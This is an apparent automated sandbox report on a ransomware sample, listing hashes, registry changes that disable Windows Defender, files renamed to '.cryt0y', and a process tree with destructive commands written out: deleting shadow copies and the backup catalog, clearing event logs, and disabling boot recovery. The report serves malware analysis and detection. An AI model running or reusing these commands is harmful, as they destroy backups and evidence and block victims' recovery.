Analysis
max time kernel: 172s
max time network: 175s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 24/09/2022, 09:40
Behavioral task behavioral1
Sample: HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Resource: win7-20220901-en
Behavioral task behavioral2
Sample: HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Resource: win10v2004-20220812-en
General
Target: HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Size: 555KB
MD5: 2102422fdf58e1f1ea628e864576f437
SHA1: a071690fa220c12e9b5fa85e70dc3e7c42b30893
SHA256: fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997
SHA512: 9894a54a6c85ce3e087ef6f2a6da1a5744d71667eaa8f17d23985e15c39a425cfe53f838875573e828170ce6d3756618c4b293e3d81dfc7a7a5570daf2c0c2b6
SSDEEP: 12288:gfp3lxis8EdrQso5hnyRIAPQJno5hnyRIAQg:gfp36sN5snUPjnUQg
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | mesthh4q.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | mesthh4q.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | mesthh4q.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | mesthh4q.exe
Clears Windows event logs 1 TTPs 3 IoCs
pid | Process
2288 | wevtutil.exe
1488 | wevtutil.exe
4892 | wevtutil.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid | Process
4352 | bcdedit.exe
1760 | bcdedit.exe
Deletes backup catalog
pid | Process
5088 | wbadmin.exe
Executes dropped EXE 1 IoCs
pid | Process
2488 | mesthh4q.exe
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\BackupEnable.png => C:\Users\Admin\Pictures\BackupEnable.png.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\DisconnectOpen.tif => C:\Users\Admin\Pictures\DisconnectOpen.tif.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\ShowMount.crw => C:\Users\Admin\Pictures\ShowMount.crw.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\SplitRead.tif => C:\Users\Admin\Pictures\SplitRead.tif.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\CompleteUndo.tif => C:\Users\Admin\Pictures\CompleteUndo.tif.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\ImportRestore.crw => C:\Users\Admin\Pictures\ImportRestore.crw.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\MoveRestore.png => C:\Users\Admin\Pictures\MoveRestore.png.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\PublishGrant.tif => C:\Users\Admin\Pictures\PublishGrant.tif.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\RevokeGroup.raw => C:\Users\Admin\Pictures\RevokeGroup.raw.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\SyncPublish.raw => C:\Users\Admin\Pictures\SyncPublish.raw.cryt0y | mesthh4q.exe
File renamed | C:\Users\Admin\Pictures\TestDeny.crw => C:\Users\Admin\Pictures\TestDeny.crw.cryt0y | mesthh4q.exe
Loads dropped DLL 1 IoCs
pid | Process
3524 | HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Obfuscated with Agile.Net obfuscator 4 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral2/memory/3524-132-0x00000000002F0000-0x000000000037E000-memory.dmp | agile_net
behavioral2/files/0x0007000000022e4e-141.dat | agile_net
behavioral2/files/0x0007000000022e4e-140.dat | agile_net
behavioral2/memory/2488-142-0x0000000000E20000-0x0000000000E96000-memory.dmp | agile_net
Windows security modification
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | mesthh4q.exe
Drops file in Program Files directory 64 IoCs
description | ioc | Process
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-125_contrast-black.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LibrarySquare150x150Logo.scale-100_contrast-black.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\WideTile.scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.altform-unplated_targetsize-24.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\197.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-explorer.xml | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-180.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF | mesthh4q.exe
File opened for modification | C:\Program Files\DisconnectNew.m4a | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\Maple.gif | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageSmallTile.scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-125_contrast-black.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.contrast-black_scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsLargeTile.scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\184.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_altform-lightunplated.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-125_contrast-black.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL086.XML | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\THMBNAIL.PNG | mesthh4q.exe
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\MedTile.scale-125_contrast-black.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-200_contrast-high.png | mesthh4q.exe
File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML | mesthh4q.exe
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\view.html | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\MedTile.scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-125_contrast-black.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_SplashScreen.scale-100.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL097.XML | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN027.XML | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png | mesthh4q.exe
File opened for modification | C:\Program Files\Mozilla Firefox\uninstall\uninstall.log | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-200.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Images\contrast-black\Settings.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-24_altform-lightunplated.png | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientOSub_eula.txt | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\LibrarySquare71x71Logo.scale-125_contrast-white.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\LyncBasic_Eula.txt | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx | mesthh4q.exe
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\PREVIEW.GIF | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-125.png | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml | mesthh4q.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MediumTile.scale-125_contrast-black.png | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html | mesthh4q.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml | mesthh4q.exe
Drops file in Windows directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | wbadmin.exe
File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | wbadmin.exe
File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | wbadmin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3936 | vssadmin.exe
Kills process with taskkill 1 IoCs
pid | Process
1264 | taskkill.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
3524 | HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
(the same pid/process pair is recorded for all 64 IoCs)
Suspicious use of AdjustPrivilegeToken 59 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3524 | HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
Token: SeDebugPrivilege | 1264 | taskkill.exe
Token: SeDebugPrivilege | 2488 | mesthh4q.exe (recorded twice)
Token: SeDebugPrivilege | 2748 | powershell.exe
Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege | 176 | vssvc.exe
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 4564 | WMIC.exe (this sequence of 21 tokens is recorded twice)
Token: SeSecurityPrivilege, SeBackupPrivilege | 2288 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 1488 | wevtutil.exe
Token: SeSecurityPrivilege, SeBackupPrivilege | 4892 | wevtutil.exe
Token: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege | 4712 | wbengine.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
3524 | HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe (recorded twice)
Suspicious use of WriteProcessMemory 24 IoCs
description | pid | Process | procid_target
PID 3524 wrote to memory of 4200 | 3524 | HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe | 80
PID 3812 wrote to memory of 2488 | 3812 | cmd.exe | 84
PID 2488 wrote to memory of 2748 | 2488 | mesthh4q.exe | 89
PID 2488 wrote to memory of 3656 | 2488 | mesthh4q.exe | 91
PID 3656 wrote to memory of 3936 | 3656 | cmd.exe | 93
PID 3656 wrote to memory of 4564 | 3656 | cmd.exe | 96
PID 3656 wrote to memory of 2288 | 3656 | cmd.exe | 97
PID 3656 wrote to memory of 1488 | 3656 | cmd.exe | 98
PID 3656 wrote to memory of 4892 | 3656 | cmd.exe | 100
PID 3656 wrote to memory of 4352 | 3656 | cmd.exe | 102
PID 3656 wrote to memory of 1760 | 3656 | cmd.exe | 103
PID 3656 wrote to memory of 5088 | 3656 | cmd.exe | 104
(each of the 12 writes is recorded twice, giving the 24 IoCs)
Processes
(indentation shows parent/child nesting; each entry gives the image path, the command line, the PID and the signatures triggered)

C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Agent.gen-fffc3cd304a280746276a3fa580a08f3de6aa2db4196c28ebd1c905607de0997.exe"
  PID: 3524
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    \??\c:\windows\system32\cmstp.exe
      command line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\clye5h5t.inf
      PID: 4200

C:\Windows\system32\cmd.exe
  command line: cmd /c start C:\Windows\temp\mesthh4q.exe
  PID: 3812
  - Suspicious use of WriteProcessMemory
    C:\Windows\temp\mesthh4q.exe
      command line: C:\Windows\temp\mesthh4q.exe
      PID: 2488
      - Modifies Windows Defender Real-time Protection settings
      - Executes dropped EXE
      - Modifies extensions of user files
      - Windows security modification
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          command line: "powershell" Get-MpPreference -verbose
          PID: 2748
          - Suspicious use of AdjustPrivilegeToken
        C:\Windows\system32\cmd.exe
          command line: "cmd.exe"
          PID: 3656
          - Suspicious use of WriteProcessMemory
            C:\Windows\system32\vssadmin.exe
              command line: vssadmin.exe delete shadows /all /quiet
              PID: 3936
              - Interacts with shadow copies
            C:\Windows\System32\Wbem\WMIC.exe
              command line: WMIC shadowcopy delete
              PID: 4564
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\wevtutil.exe
              command line: wevtutil.exe cl Application
              PID: 2288
              - Clears Windows event logs
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\wevtutil.exe
              command line: wevtutil.exe cl Security
              PID: 1488
              - Clears Windows event logs
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\wevtutil.exe
              command line: wevtutil.exe cl System
              PID: 4892
              - Clears Windows event logs
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\bcdedit.exe
              command line: Bcdedit.exe /set {default} recoveryenabled no
              PID: 4352
              - Modifies boot configuration data using bcdedit
            C:\Windows\system32\bcdedit.exe
              command line: Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
              PID: 1760
              - Modifies boot configuration data using bcdedit
            C:\Windows\system32\wbadmin.exe
              command line: wbadmin delete catalog
              PID: 5088
              - Deletes backup catalog
              - Drops file in Windows directory

C:\Windows\system32\taskkill.exe
  command line: taskkill /IM cmstp.exe /F
  PID: 1264
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  PID: 176
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbengine.exe
  command line: "C:\Windows\system32\wbengine.exe"
  PID: 4712
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\vdsldr.exe
  command line: C:\Windows\System32\vdsldr.exe -Embedding
  PID: 3380

C:\Windows\System32\vds.exe
  command line: C:\Windows\System32\vds.exe
  PID: 3060
  - Checks SCSI registry key(s)
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 75KB
MD5: 42b2c266e49a3acd346b91e3b0e638c0
SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Filesize: 449KB
MD5: 1db0b6b8d8429a19745386172720b241
SHA1: bbe8ca48fecc9ee2e909a453e60bda1548b85898
SHA256: 0c903b0104a81695efd95240e79ba5d93cabae598acd193ac5f629d6ca10653d
SHA512: e483213f1e64243a8f72b75dfca4dd6998122ddf08317849d4402d118dd39a5859e60cc880523573794809a06ef4b61a36c3113d80a289277828a5340042255e

Filesize: 583B
MD5: 8c0db96fe81b49ba6bd3508ef807a890
SHA1: aa452d23a161f21cfa7844ec9ea530433e4b6314
SHA256: 646de5e32d78a2e858437cf8d9c8a568602df6bfa7779d1b539f3483662b77cf
SHA512: bf8091e46ca71ec821e624825c68a6c07fc0b1c5f3aea8cf4e3a539185fc5823a8b49d975825478415a2f284e32fe5f2b648ed315d5e769569dac82e096d50ea

Filesize: 449KB
MD5: 1db0b6b8d8429a19745386172720b241
SHA1: bbe8ca48fecc9ee2e909a453e60bda1548b85898
SHA256: 0c903b0104a81695efd95240e79ba5d93cabae598acd193ac5f629d6ca10653d
SHA512: e483213f1e64243a8f72b75dfca4dd6998122ddf08317849d4402d118dd39a5859e60cc880523573794809a06ef4b61a36c3113d80a289277828a5340042255e